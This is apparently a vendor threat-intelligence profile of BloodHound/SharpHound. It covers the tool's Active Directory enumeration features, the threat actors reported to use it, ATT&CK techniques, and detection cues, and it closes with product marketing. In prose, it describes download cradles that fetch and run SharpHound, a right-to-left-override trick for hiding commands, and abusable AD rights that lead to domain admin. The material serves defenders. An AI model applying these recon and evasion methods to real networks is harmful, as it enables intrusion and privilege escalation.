BloodHound
BloodHound is an Active Directory reconnaissance and relationship-mapping tool, with SharpHound serving as its data collection ingestor. It is used to enumerate and collect information about domain users, domain administrator accounts, local and domain groups, user sessions, domain computers including domain controllers, domain trusts, and Group Policy-derived local administrator relationships. The tool can gather Active Directory data through PowerShell and .NET API calls, and SharpHound can compress collected data into a ZIP archive written to disk. The content also notes BloodHound can reveal replication-related privileges in Active Directory.
BloodHound is widely used in penetration testing and by internal security teams, but the content also documents repeated use by threat actors during real intrusions for network reconnaissance, Active Directory mapping, and identifying privilege-escalation and lateral-movement paths. Reported examples include Russian state-sponsored actors targeting U.S. cleared defense contractors, attackers in the Capita 2023 intrusion, UNC2447 activity, Play, and other intrusion sets using BloodHound alongside tools such as Cobalt Strike, Mimikatz, PsExec, AdFind, and PowerView. In several cited cases, BloodHound use occurred prior to ransomware deployment or during broader post-compromise discovery.
Observed execution patterns in the content include PowerShell-based invocation of SharpHound, including download cradles that retrieve SharpHound.ps1 from public repositories and execute Invoke-BloodHound from memory or local disk. The content highlights detection opportunities around SharpHound/BloodHound LDAP query patterns, anomalous SPN requests associated with Kerberoasting indicators, and large-scale Active Directory enumeration. High-confidence behavioral indicators mentioned include PowerShell commands downloading SharpHound.ps1, Invoke-BloodHound execution, LDAP-based Active Directory collection, and SharpHound-produced ZIP archives containing collected directory data.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation.
During an intrusion, tools such as Cobalt Strike, PowerShell Empire, Bloodhound, PSExec... are used for network discovery and traversal, privilege escalation, staging, and ransomware deployment.
"SharpHound... for BloodHound (an open-source Active Directory analysis tool used to identify attack paths in AD environments)."
...UNC2447 has been observed using the following tools: ADFIND, BLOODHOUND...
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueThe content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Execution
1 techniqueThe content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
Privilege Escalation
3 techniquesThere are also built-in escalation path queries, such as built-in queries for Active Directory Certificate Services (ADCS) privilege escalation techniques.
Access Control Lists (ACL) misconfiguration is one of the most common issues Microsoft Incident Response finds in Active Directory environments... These attack paths create an escalation path from a low privileged user to total domain control.
Some of the typically misused rights include: ForceChangePassword ... GenericAll ... GenericWrite ... WriteOwner ... WriteDacl ... Self ... These things can have critical impact and often times lead to Domain Admin privileges.
Stealth
2 techniques"You could detect it with traffic to 9389 (ADWS) but there's an even bigger problem there, all of RSAT uses ADWS. So sysadmins doing normal operations would trigger false positives."
Another deception example is the use of the infamous Right-To-Left Override (RLO) character... Invoking a PowerShell command that downloads and executes BloodHound, with argv[0] containing the RLO character \u202E, makes it much harder to understand what is going on when looking at the reported command line.
Defense Impairment
1 techniqueDiscovery
12 techniquesIn BOFHound output mode, all attributes for every object are parsed and outputted to BOFHound format... Computers collection
Further investigation revealed a Git repository that contains a framework of tools and scripts that align with two components: an automated Active Directory (AD) discovery panel
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
For four days – March 24-28 – they conducted network reconnaissance using Cobalt Strike and Bloodhound before Capita detected three compromised staff devices and contained them.
System Networks Connections Discovery [T1049]: A common tool used for this network enumeration tactic is Bloodhound.
Users collection Groups collection Computers collection Trusts collection OU collection GPO collection Certificate template collection
GeminiDuke focuses primarily on gathering details about the victim’s computer’s configuration.
After gaining access to networks, the threat actors used BloodHound to map the Active Directory.
Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack.
The threat actor executed Bloodhound to map out the AD environment
Recent activity
52 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced through detection names indicating use or testing of Active Directory discovery and attack-path mapping capabilities within the broader framework.
An Active Directory reconnaissance and attack-path mapping tool referenced via detections tied to this threat activity.
Explicitly described as a tool for Active Directory mapping used during intrusions.
BloodHound is discussed as an attack-path and privilege-analysis tool used to identify accounts with replication rights in Active Directory.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.